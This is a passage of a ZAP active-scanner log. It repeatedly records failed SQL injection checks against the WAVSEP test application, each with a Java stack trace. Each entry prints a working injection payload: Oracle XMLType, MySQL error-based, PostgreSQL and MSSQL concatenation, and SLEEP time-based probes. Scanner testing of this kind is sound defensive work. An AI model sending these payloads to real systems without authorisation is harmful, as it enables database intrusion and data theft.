org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688257 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 6096=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6096=6096) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6687=6687] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND 6096=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6096=6096) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6687=6687 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688258 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3714=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3714=3714) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 3714=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3714=3714) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688259 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 6889=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('iSba'='iSba] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND 6889=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6889=6889) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('iSba'='iSba at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688259 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 2887=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2887=2887) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'RNqj'='RNqj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND 2887=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2887=2887) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'RNqj'='RNqj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688260 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 4793=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4793=4793) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND 4793=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4793=4793) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688262 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 1903=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1903=1903) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- uJuK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 1903=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1903=1903) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- uJuK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688265 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 6158 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6158=6158,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/(SELECT 6158 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6158=6158,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688266 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9699=9699,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9699=9699,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688267 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6916=6916) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6916=6916) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688268 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7151=7151) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7151=7151) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688269 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);(SELECT * FROM (SELECT(SLEEP(5)))jhTk)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))jhTk)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688270 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;(SELECT * FROM (SELECT(SLEEP(5)))HRbQ)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))HRbQ)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688270 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for 